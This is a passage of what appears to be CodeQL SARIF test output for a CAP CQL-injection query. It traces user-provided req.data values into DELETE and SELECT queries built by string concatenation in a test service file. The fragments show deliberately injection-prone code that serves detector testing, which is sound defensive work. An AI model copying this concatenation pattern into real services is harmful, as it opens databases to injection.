}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":47,"endColumn":58}},"message":{"text":"`ID =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":13,"endColumn":59}},"message":{"text":"DELETE. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":7,"endColumn":59}},"message":{"text":"await D ... ` + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":7,"endColumn":59}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":13,"endColumn":60}}}],"partialFingerprints":{"primaryLocationLineHash":"a76513a6cb8f584d:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":55,"endColumn":57}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":47,"endColumn":59}},"message":{"text":"`ID = ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":13,"endColumn":60}},"message":{"text":"DELETE. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":7,"endColumn":60}},"message":{"text":"await D ... ${id}`)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":7,"endColumn":60}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":254,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"e396e28dff49f821:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":254,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":7,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"4710d78c10aa291b:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":50,"endColumn":52}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":41,"endColumn":52}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":41,"endColumn":52}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":7,"endColumn":86}}}],"partialFingerprints":{"primaryLocationLineHash":"6f850daa3f58c276:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":57,"endColumn":63}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":41,"endColumn":63}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":83,"endColumn":85}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":71,"endColumn":85}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":41,"endColumn":63}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":71,"endColumn":85}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":7,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"b9f8b15603ad6b38:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":52,"endColumn":54}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":43,"endColumn":54}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":43,"endColumn":54}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":292,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"d576c66caddc969a:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":292,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":7,"endColumn":57}}}],"partialFingerprints":{"primaryLocationLineHash":"3b0cd005704d307:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":54,"endColumn":56}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":45,"endColumn":56}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":45,"endColumn":56}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":7,"endColumn":90}}}],"partialFingerprints":{"primaryLocationLineHash":"a2422d95f31b0028:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":61,"endColumn":67}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":45,"endColumn":67}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":87,"endColumn":89}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":75,"endColumn":89}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":45,"endColumn":67}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":75,"endColumn":89}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":7,"endColumn":59}}}],"partialFingerprints":{"primaryLocationLineHash":"53b68a547e06f5f5:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":47,"endColumn":58}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":326,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":328,"startColumn":47,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided 